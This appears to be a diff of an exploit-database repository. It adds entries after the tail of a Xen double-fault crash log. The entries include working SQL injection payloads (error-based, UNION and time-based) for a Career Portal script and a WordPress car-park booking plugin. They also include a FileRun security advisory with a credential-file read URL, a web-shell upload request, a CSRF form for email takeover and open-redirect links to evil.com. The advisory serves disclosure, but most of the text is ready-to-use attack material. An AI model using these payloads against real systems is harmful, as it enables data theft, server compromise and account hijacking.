(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080237f6f>] common_interrupt+0x5f/0x70
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d08017a028>] put_page_from_l1e+0xb8/0x130
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d08017a28a>] mm.c#put_page_from_l2e+0x7a/0x190
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d08017a438>] mm.c#put_page_from_l4e+0x88/0xc0
(XEN) [<ffff82d080179697>] free_page_type+0x157/0x630
(XEN) [<ffff82d0801793ae>] mm.c#get_page_from_pagenr+0x4e/0x60
(XEN) [<ffff82d080179cdf>] mm.c#__put_page_type+0x16f/0x290
(XEN) [<ffff82d0801791e3>] get_page+0x13/0xf0
(XEN) [<ffff82d080183056>] do_mmuext_op+0x1056/0x1500
(XEN) [<ffff82d080182000>] do_mmuext_op+0/0x1500
(XEN) [<ffff82d080169c96>] pv_hypercall+0xf6/0x1c0
(XEN) [<ffff82d08019bea3>] do_page_fault+0x163/0x4c0
(XEN) [<ffff82d080237abe>] entry.o#test_all_events+0/0x2a
(XEN)
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
==============================
This PoC just causes a DoS, but as far as I can tell, Xen only uses
guard pages for the stack (via memguard_guard_stack()) in debug builds,
which would mean that this is a potentially exploitable issue in release builds.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/43014.zip

3
platforms/php/webapps/18356.txt
View file

@ -9,7 +9,8 @@ Date:
References: References:
===========http://www.vulnerability-lab.com/get_content.php?id=379 ===========
http://www.vulnerability-lab.com/get_content.php?id=379
VL-ID: VL-ID:

2
platforms/php/webapps/39474.txt
View file

@ -5,7 +5,7 @@ Chamilo LMS - Persistent Cross Site Scripting Vulnerability
References (Source): References (Source):
==================== ====================
http://www.vulnerability-lab.com/get_content.php?id= https://www.vulnerability-lab.com/get_content.php?id=1727
Video: https://www.youtube.com/watch?v=gNZsQjmtiGI Video: https://www.youtube.com/watch?v=gNZsQjmtiGI

41
platforms/php/webapps/43011.txt Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: Career Portal v1.0 - SQL Injection
# Date: 2017-10-17
# Exploit Author: 8bitsec
# Vendor Homepage: https://codecanyon.net/item/career-portal-online-job-search-script/20767278
# Software Link: https://codecanyon.net/item/career-portal-online-job-search-script/20767278
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-17
Product & Service Introduction:
===============================
Career Portal is developed for creating an interactive job vacancy for candidates.
Technical Details & Description:
================================
SQL injection on [keyword] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/job
Parameter: keyword (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: keyword=s_term') AND (SELECT 8133 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(8133=8133,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('kRoT'='kRoT&location_name[]=
Type: UNION query
Title: Generic UNION query (NULL) - 25 columns
Payload: keyword=s_term') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a7171,0x594547646454726868515056467764674e59726f4252436844774f41704a507353574e4b6d5a5973,0x71787a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zANd&location_name[]=
==================
8bitsec - [https://twitter.com/_8bitsec]

37
platforms/php/webapps/43012.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Wordpress Plugin Car Park Booking - SQL Injection
# Date: 2017-10-17
# Exploit Author: 8bitsec
# Vendor Homepage: https://codecanyon.net/item/car-park-booking-wordpress-plugin/20284035
# Software Link: https://codecanyon.net/item/car-park-booking-wordpress-plugin/20284035
# Version: 13 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-17
Product & Service Introduction:
===============================
Generate more sales, enhance your car park booking service, and have more time to organize the business.
Technical Details & Description:
================================
SQL injection on [space_id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/booking-page/?step=3&space_id=9 AND SLEEP(5)&re_price=12
Parameter: space_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: step=3&space_id=9 AND SLEEP(5)&re_price=12
==================
8bitsec - [https://twitter.com/_8bitsec]

268
platforms/php/webapps/43015.txt Executable file
View file

@ -0,0 +1,268 @@
SEC Consult Vulnerability Lab Security Advisory < 20171018-0 >
=======================================================================
title: Multiple vulnerabilities
product: Afian AB FileRun
vulnerable version: 2017.03.18
fixed version: 2017.09.18
impact: critical
homepage: https://www.filerun.com | https://afian.se
found: 2017-08-28
by: Roman Ferdigg (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"FileRun File Manager: access your files anywhere through self-hosted
secure cloud storage, file backup and sharing for your photos, videos,
files and more. Upload and download large files for easy sharing. Google
Drive self-hosted alternative."
Source: https://www.filerun.com
Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can compromise the web server which has FileRun installed. User files might
get exposed through this attack.
SEC Consult recommends not to use FileRun until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.
Vulnerability overview/description:
-----------------------------------
1) Path Manipulation
When uploading, downloading or viewing files, FileRun uses a parameter to
specify the path on the file-system. An attacker can manipulate the value
of this parameter to read, create and even overwrite files in certain
folders. An attacker could upload malicious files to compromise the
webserver. In combination with the open redirect and CSRF vulnerability
even an unauthenticated attacker can upload these files to get a shell.
Through the shell all user files can be accessed.
2) Stored Cross Site Scripting (XSS) via File Upload
The application allows users to upload different file types. It is also
possible to upload HTML files or to create them via the application's text
editor. Files can be shared using a link or within the FileRun application
(in the enterprise version). An attacker can inject JavaScript in HTML
files to attack other users or simply create a phishing site to steal user
credentials.
Remark:
In the standard configuration of the FileRun docker image the HttpOnly
cookie flag is not set, which means that authentication cookies can be
accessed in an XSS attack. This allows easy session hijacking as well.
3) Cross Site Request Forgery (CSRF)
The application does not implement CSRF protection. An attacker can exploit
this vulnerability to execute arbitrary requests with the privileges of the
victim. The only requirement is that a victim visits a malicious webpage.
Such a page could be hosted on the FileRun server itself and shared with
other users as described in vulnerability 2.
Besides others, the following actions can be performed via CSRF if the
victim has administrative privileges:
- Create or delete users
- Change permissions rights of users
- Change user passwords
If the victim has no administrative privileges, for example the following
actions can be performed:
- Upload files
- Change the email address (for password recovery)
4) Open Redirect Vulnerabilities
An open redirect vulnerability in the login and logout pages allows an
attacker to redirect users to arbitrary web sites. The redirection host
could be used for phishing attacks (e.g. to steal user credentials) or for
running browser exploits to infect a victim's machine with malware. The open
redirect in the login page could also be used to exploit CSRF (see above).
Because the server name in the manipulated link is identical to the
original site, phishing attempts may have a more trustworthy appearance.
Proof of concept:
-----------------
1) Path Manipulation
The URL below is used to read the application file "autoconfig.php", which
contains the username and cleartext password of the database.
URL:
http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php
This post request is used to upload a PHP shell in the writable folder
avatars:
POST /?module=fileman_myfiles&section=ajax&page=up HTTP/1.1
Host: $DOMAIN
[...]
Content-Type: multipart/form-data; boundary=---------------------------293712729522107
Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english
DNT: 1
Connection: close
-----------------------------293712729522107
Content-Disposition: form-data; name="flowTotalSize"
150
-----------------------------293712729522107
Content-Disposition: form-data; name="flowIsFirstChunk"
1
-----------------------------293712729522107
Content-Disposition: form-data; name="flowIsLastChunk"
1
-----------------------------293712729522107
Content-Disposition: form-data; name="flowFilename"
shell.php
-----------------------------293712729522107
Content-Disposition: form-data; name="path"
/var/www/html/system/data/avatars/
-----------------------------293712729522107
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
*web shell payload here*
-----------------------------293712729522107--
To execute the uploaded shell a .htaccess file with the contents below can
be uploaded in the same folder.
Content of .htaccess file:
<Files "*">
Order allow,deny
Allow from all
</Files>
The uploaded shell can be accessed by the following URL:
http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/avatars/shell.php
2) Stored Cross Site Scripting (XSS) via File Upload
An HTML file with JavaScript code can be easily uploaded to attack other users.
No PoC necessary.
3) Cross Site Request Forgery
An example for a CSRF attack would be the following request which changes
the email address of the victim:
<html>
<body>
<form action="http://$DOMAIN/?module=fileman&section=profile&action=save"
method="POST">
<input type="hidden" name="receive_notifications" value="0" />
<input type="hidden" name="two_step_enabled" value="0" />
<input type="hidden" name="name" value="User" />
<input type="hidden" name="name2" value="A" />
<input type="hidden" name="email" value="newemail@example.com" />
<input type="hidden" name="ext-comp-1009" value="on" />
<input type="hidden" name="current_password" value="" />
<input type="hidden" name="new_password" value="" />
<input type="hidden" name="confirm_new_password" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The new email address can be used by the attacker to reset the password of
the victim.
4) Open Redirect Vulnerabilites
The URL below can be used to forward a user to an arbitrary website after
the login:
http://$DOMAIN/?redirectAfterLogin=aHR0cDovL3d3dy5ldmlsLmNvbQ==
The value of the redirect parameter needs to be base64 encoded.
To redirect a user after logout, following URL can be used:
http://$DOMAIN/?module=fileman&page=logout&redirect=http://evil.com
In this case for a successful exploit, the victim has to be logged in.
Vulnerable / tested versions:
-----------------------------
The regular version of FileRun 2017.03.18 has been tested. It is assumed
earlier versions of FileRun are also vulnerable to the issues.
Vendor contact timeline:
------------------------
2017-08-31: Contacting vendor through info@afian.se, info@filerun.com
2017-09-01: Sending unencrypted advisory as requested by vendor
2017-09-04: FileRun fixed the vulnerability "Path Manipulation"
2017-09-12: Requesting a status update
2017-09-13: FileRun informed us that a patch for all vulnerabilities will
be released before 2017-09-20
2017-09-16: Patch available
2017-10-18: Public release of security advisory
Solution:
---------
Update to the latest version available (see https://docs.filerun.com/updating).
According to FileRun, all the vulnerabilities are fixed in release
2017.09.18 or higher.
For further information see:
https://www.filerun.com/changelog
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Roman Ferdigg / @2017